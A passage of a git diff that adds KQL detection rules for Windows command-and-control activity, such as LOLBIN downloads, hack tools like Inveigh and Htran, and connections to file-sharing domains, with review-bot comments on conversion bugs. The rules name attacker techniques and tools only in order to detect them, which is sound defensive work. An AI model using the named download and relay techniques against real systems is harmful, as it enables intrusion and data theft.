+// Description: Detects when a user downloads a file by using CertOC.exe
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-GetCACAPS" and ProcessCommandLine contains "http") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/finger_exe_execution.kql b/KQL/rules/Command and Control/finger_exe_execution.kql
new file mode 100644
index 00000000..965cbed0
--- /dev/null
+++ b/KQL/rules/Command and Control/finger_exe_execution.kql
@@ -0,0 +1,15 @@
+// Title: Finger.EXE Execution
+// Author: Florian Roth (Nextron Systems), omkar72, oscd.community
+// Date: 2021-02-24
+// Level: high
+// Description: Detects execution of the "finger.exe" utility.
+Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.
+Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Admin activity (unclear what they do nowadays with finger.exe)
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "finger.exe" or FolderPath endswith "\\finger.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql b/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql new file mode 100644 index 00000000..d0e6c8ac --- /dev/null +++ b/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql @@ -0,0 +1,15 @@ +// Title: GoToAssist Temporary Installation Artefact +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceFileEvents +| where FolderPath contains "\\AppData\\Local\\Temp\\LogMeInInc\\GoToAssist Remote Support Expert\\" \ No newline at end of file diff --git a/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql b/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql new file mode 100644 index 00000000..02330050 --- /dev/null +++ b/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql 
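Review bot: `DeviceFileEvents` with no `ActionType` predicate matches modification, rename and deletion of the GoToAssist temp artefact as well as its creation, whereas the Sigma `file_event` category this was converted from denotes file creation; an uninstall or temp-folder cleanup would therefore fire the rule a second time. Add `and ActionType == "FileCreated"` to the where clause. The same omission appears in the other DeviceFileEvents rules in this commit (Inveigh, RemoteKrbRelay, the RDP startup-folder rule and TeamViewer_Desktop), so it is best fixed once in the backend's category mapping rather than per file. The description's second and third lines also lack the `//` prefix, which makes this file unparsable as KQL.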
@@ -0,0 +1,12 @@
+// Title: Gzip Archive Decode Via PowerShell
+// Author: Hieu Tran
+// Date: 2023-03-13
+// Level: medium
+// Description: Detects attempts of decoding encoded Gzip archives via PowerShell.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1132.001
+// False Positives:
+// - Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "GZipStream" and ProcessCommandLine contains "::Decompress"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql b/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql
new file mode 100644
index 00000000..c65ddad2
--- /dev/null
+++ b/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Htran/NATBypass Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-12-27
+// Level: high
+// Description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090, attack.s0040
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".exe -tran " or ProcessCommandLine contains ".exe -slave ") or (FolderPath endswith "\\htran.exe" or FolderPath endswith "\\lcx.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql b/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql
new file mode 100644
index 00000000..54836e41
--- /dev/null
+++ b/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql
@@ -0,0 +1,12 @@ +// Title: HackTool - Inveigh Execution Artefacts +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-24 +// Level: critical +// Description: Detects the presence and execution of Inveigh via dropped artefacts +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith "\\Inveigh-Log.txt" or FolderPath endswith "\\Inveigh-Cleartext.txt" or FolderPath endswith "\\Inveigh-NTLMv1Users.txt" or FolderPath endswith "\\Inveigh-NTLMv2Users.txt" or FolderPath endswith "\\Inveigh-NTLMv1.txt" or FolderPath endswith "\\Inveigh-NTLMv2.txt" or FolderPath endswith "\\Inveigh-FormInput.txt" or FolderPath endswith "\\Inveigh.dll" or FolderPath endswith "\\Inveigh.exe" or FolderPath endswith "\\Inveigh.ps1" or FolderPath endswith "\\Inveigh-Relay.ps1" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql b/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql new file mode 100644 index 00000000..5e160de7 --- /dev/null +++ b/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql @@ -0,0 +1,12 @@ +// Title: HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-27 +// Level: high +// Description: Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith ":\\windows\\temp\\sam.tmp" or FolderPath endswith ":\\windows\\temp\\sec.tmp" or FolderPath endswith ":\\windows\\temp\\sys.tmp" \ No newline at end of file 
diff --git a/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql b/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql new file mode 100644 index 00000000..3a3ced1f --- /dev/null +++ b/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - SharpChisel Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-05 +// Level: high +// Description: Detects usage of the Sharp Chisel via the commandline arguments +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\SharpChisel.exe" or ProcessVersionInfoProductName =~ "SharpChisel" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql new file mode 100644 index 00000000..03be964c --- /dev/null +++ b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql @@ -0,0 +1,12 @@ +// Title: HackTool - SILENTTRINITY Stager DLL Load +// Author: Aleksey Potapov, oscd.community +// Date: 2019-10-22 +// Level: high +// Description: Detects SILENTTRINITY stager dll loading activity +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where InitiatingProcessVersionInfoFileDescription contains "st2stager" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql new file mode 100644 index 00000000..ab5c4a75 --- /dev/null +++ b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql 
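Review bot: In the SILENTTRINITY DLL-load rule, `InitiatingProcessVersionInfoFileDescription contains "st2stager"` describes the process that performs the load, not the image being loaded, so the rule fires on the stager executable itself and merely duplicates the process-creation rule that follows, instead of catching a DLL-form stager pulled into an unrelated host process as the title and description promise. As far as the schema goes, DeviceImageLoadEvents exposes only `FileName`, `FolderPath` and hashes for the loaded image and no version-info columns, so the Sigma `Description` field has no one-to-one mapping; the closest usable predicate is an image-level match such as `| where FileName contains "st2stager" or FolderPath contains "st2stager"`, which I am inferring from the description string and would confirm against a sample. If the translation is kept as is, the description comment should at least say the match is on the loading process.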
@@ -0,0 +1,12 @@ +// Title: HackTool - SILENTTRINITY Stager Execution +// Author: Aleksey Potapov, oscd.community +// Date: 2019-10-22 +// Level: high +// Description: Detects SILENTTRINITY stager use via PE metadata +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessVersionInfoFileDescription contains "st2stager" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql b/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql new file mode 100644 index 00000000..1f59abde --- /dev/null +++ b/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql @@ -0,0 +1,12 @@ +// Title: Hijack Legit RDP Session to Move Laterally +// Author: Samir Bousseaden +// Date: 2019-02-21 +// Level: high +// Description: Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\mstsc.exe" and FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" \ No newline at end of file diff --git a/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql b/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql new file mode 100644 index 00000000..c4890547 --- /dev/null +++ b/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql 
@@ -0,0 +1,13 @@ +// Title: Import LDAP Data Interchange Format File Via Ldifde.EXE +// Author: @gott_cyber +// Date: 2022-09-02 +// Level: medium +// Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.defense-evasion, attack.t1218, attack.t1105 +// False Positives: +// - Since the content of the files are unknown, false positives are expected + +DeviceProcessEvents +| where (ProcessCommandLine contains "-i" and ProcessCommandLine contains "-f") and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql b/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql new file mode 100644 index 00000000..b5161330 --- /dev/null +++ b/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql @@ -0,0 +1,10 @@ +// Title: Installation of TeamViewer Desktop +// Author: frack113 +// Date: 2022-01-28 +// Level: medium +// Description: TeamViewer_Desktop.exe is create during install +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 + +DeviceFileEvents +| where FolderPath endswith "\\TeamViewer_Desktop.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql new file mode 100644 index 00000000..ed761e87 --- /dev/null +++ b/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql 
@@ -0,0 +1,13 @@
+// Title: Local Network Connection Initiated By Script Interpreter
+// Author: frack113
+// Date: 2022-08-28
+// Level: medium
+// Description: Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate scripts
+
+DeviceNetworkEvents
+| where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) and (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql b/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql
new file mode 100644
index 00000000..7ba54289
--- /dev/null
+++ b/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql
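Review bot: `ipv4_is_in_range` is handed the IPv6 ranges `::1/128`, `fe80::/10` and `fc00::/7`; the function only parses IPv4 text, so those three predicates never evaluate true and a cscript/wscript connection to a link-local or ULA IPv6 peer (or to `::1`) silently falls outside the rule. Use the IPv6 variant for those entries: `ipv6_is_in_range(RemoteIP, "::1/128") or ipv6_is_in_range(RemoteIP, "fe80::/10") or ipv6_is_in_range(RemoteIP, "fc00::/7")`. The backend should pick the function by the literal's address family rather than emitting `ipv4_is_in_range` for every CIDR, since the same construct will recur in any rule with a private-range list. Separately, the title says "Initiated" but there is no `ActionType` filter, so inbound events on the interpreter would also match if the sensor records them — inferred from the title; confirm the intended scope.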
@@ -0,0 +1,12 @@
+// Title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download
+// Author: frack113
+// Date: 2022-05-28
+// Level: high
+// Description: Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
+anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql
new file mode 100644
index 00000000..138d524c
--- /dev/null
+++ b/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql
@@ -0,0 +1,12 @@
+// Title: Mstsc.EXE Execution With Local RDP File
+// Author: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock
+// Date: 2023-04-18
+// Level: low
+// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Likely with legitimate usage of ".rdp" files
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith ".rdp" or ProcessCommandLine endswith ".rdp\"") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe")))
\ No newline at end of file
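Review bot: In the OneDrive rule, `RegistryKey contains "...\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC"` is unlikely to ever match: in the MDE schema `RegistryKey` holds the key path and the value name is carried separately in `RegistryValueName`, whereas the Sigma source field (Sysmon `TargetObject`) concatenates both, so the backend has folded the value name into the key path. Assuming `UpdateRingSettingURLFromOC` is a value rather than a subkey (the description's "setting a custom URL" reads that way, but confirm with a test event), rewrite it as `RegistryKey endswith "\\SOFTWARE\\Microsoft\\OneDrive\\UpdateOfficeConfig" and RegistryValueName =~ "UpdateRingSettingURLFromOC"`. Adding `and ActionType == "RegistryValueSet"` would also drop deletions and key-creation noise. Every DeviceRegistryEvents rule this converter emits should be checked for the same key/value split, since it is a systematic mapping issue rather than a one-off.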
diff --git a/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql b/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql new file mode 100644 index 00000000..0ff75d09 --- /dev/null +++ b/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql 
@@ -0,0 +1,12 @@ +// Title: Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-08-30 +// Level: high +// Description: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule. + +DeviceNetworkEvents +| where (RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev") and (InitiatingProcessFolderPath contains 
":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Temp\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql b/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql new file mode 100644 index 00000000..d3b1434f --- /dev/null +++ b/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql @@ -0,0 +1,12 @@ +// Title: Network Communication Initiated To Portmap.IO Domain +// Author: Florian Roth (Nextron Systems) +// Date: 2024-05-31 +// Level: medium +// Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors +// MITRE Tactic: Command and Control +// Tags: attack.t1041, attack.command-and-control, attack.t1090.002, attack.exfiltration +// False Positives: +// - Legitimate use of portmap.io domains + +DeviceNetworkEvents +| where RemoteUrl endswith ".portmap.io" \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql b/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql new file mode 100644 index 00000000..a482031b --- /dev/null 
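Review bot: Most suffixes in the RemoteUrl list lack a leading dot (`"mega.nz"`, `"temp.sh"`, `"ddns.net"`, `"glitch.me"`, `"pages.dev"`, …) while `".githubusercontent.com"` has one, so `endswith` also matches any unrelated host whose name merely ends in those characters (`omega.nz`, `attemp.sh`); on a high-level rule that is avoidable noise, and the inconsistency suggests the dots were dropped in conversion rather than by design. Prefix each entry with `.` where only subdomains are expected (`".mega.nz"`, `".temp.sh"`) and keep an explicit `RemoteUrl =~ "<apex>"` for the services whose apex host serves downloads. `RemoteUrl` can be empty when the sensor did not observe a DNS lookup or URL for the flow, so a connection to one of these services by bare IP is invisible to the rule either way — worth a line in the False Positives header.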
+++ b/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql
@@ -0,0 +1,11 @@
+// Title: Network Connection Initiated By IMEWDBLD.EXE
+// Author: frack113
+// Date: 2022-01-22
+// Level: high
+// Description: Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\IMEWDBLD.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql b/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql
new file mode 100644
index 00000000..1a8a3a05
--- /dev/null
+++ b/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql
@@ -0,0 +1,11 @@ +// Title: Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2017-03-19 +// Level: high +// Description: Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceNetworkEvents +| where (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") and (not((RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "portmap.io" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or 
RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql b/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql new file mode 100644 index 00000000..008d3ad0 --- /dev/null +++ b/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql 
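Review bot: The suspicious-folder list in this rule and the one in the file-sharing-domains rule above have drifted: this rule lacks `":\\Users\\Public\\"`, `":\\Windows\\Temp\\"` and `"\\AppData\\Temp\\"`, which the sibling has, while its exclusion list contains `"portmap.io"`, which the sibling never matches. Because the exclusion exists only to hand file-sharing destinations over to the sibling, a process under `C:\Users\Public\` talking to an ordinary domain is caught by neither rule, and a process in `C:\Perflogs\` talking to portmap.io is covered only by the standalone portmap rule. Unless the narrower folder list here is intentional, align the two: add the three folders to this rule and either drop `"portmap.io"` from the exclusion or add it to the sibling's include list, and note in the header comment that the two rules are complementary so the next editor keeps them in step.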
@@ -0,0 +1,11 @@ +// Title: Network Connection Initiated To AzureWebsites.NET By Non-Browser Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-24 +// Level: medium +// Description: Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102, attack.t1102.001 + +DeviceNetworkEvents +| where RemoteUrl endswith "azurewebsites.net" and (not(((InitiatingProcessFolderPath endswith "\\avant.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avant Browser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avant Browser\\")) or (InitiatingProcessFolderPath endswith "\\brave.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\BraveSoftware\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or ((InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender Advanced Threat Protection\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") and (InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\MsSense.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\" and InitiatingProcessFolderPath endswith "\\Discord.exe") or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or 
(InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith "\\falkon.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Falkon\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Falkon\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Flock\\" and InitiatingProcessFolderPath endswith "\\Flock.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Maxthon\\" and InitiatingProcessFolderPath endswith "\\maxthon.exe") or isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\Opera\\" and InitiatingProcessFolderPath endswith "\\opera.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Phoebe\\" and InitiatingProcessFolderPath endswith "\\Phoebe.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe") or (InitiatingProcessFolderPath endswith "\\QtWeb.exe" and 
